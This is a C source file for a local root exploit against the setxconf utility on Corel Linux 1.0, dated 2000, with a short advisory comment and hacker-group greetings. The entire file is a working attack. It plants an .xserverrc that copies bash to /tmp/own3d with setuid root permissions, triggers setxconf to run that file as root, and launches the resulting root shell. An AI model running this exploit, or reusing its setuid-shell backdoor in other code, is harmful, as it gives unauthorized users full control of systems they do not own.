/*

  SetXConf Exploit (corel 1.0) by wC (wildcoyote@gk-team.org)

  Advisorie: It is possible for any local user to run a command as
             r00t on a vulnerable box! (running corel linux 1.0 with
             xconf utils)
                                                    by suid@suid.kg

  Greetz to Genetik Technologies www.gk-team.org!
*/

#include <stdio.h>
#include <strings.h>

#define setxconfpath "/sbin/setxconf"
main()
{
  char buf[256];
  FILE *fx;
  printf("\n\tSetXConf Local Exploit by wC (wildcoyote@gk-team.org)\n\n");
  printf("Setting up the SetXConf .xserverrc file...");
  system("cd $HOME");
  remove(".xserverrc");
  fx=fopen(".xserverrc","a");
  fputs("cp /bin/bash /tmp/own3d; chmod 6777 /tmp/own3d",fx);
  fclose(fx);
  printf("DONE!\n");
  sprintf(buf,"%s -T",setxconfpath);
  printf("Running %s...",setxconfpath);
  system(buf);
  printf("DONE!\n");
  printf("Checking if we have a own3d shell at /tmp/own3d...\n");
  if ((fx=fopen("/tmp/own3d","r"))==NULL)
    {
      printf("DAMN :| no own3d shell...\n");
      printf("Exiting...\n");
      printf("Greetz to Genetik Technologies crew! www.gk-team.org\n\n");
      exit(-1);
    }
  else
    {
      fclose(fx);
      printf("KEWL! =) Prepare to be r00t =)\n");
      system("/tmp/own3d");
      printf("Heh..hope you liked it :P\n");
      printf("Removing /tmp/own3d...\n");
      remove("/tmp/own3d");
      printf("Exiting...\n");
      printf("Greetz to Genetik Technologies crew! www.gk-team.org\n\n");
    }
}
/*                    www.hack.co.za           [14 June 2000]*/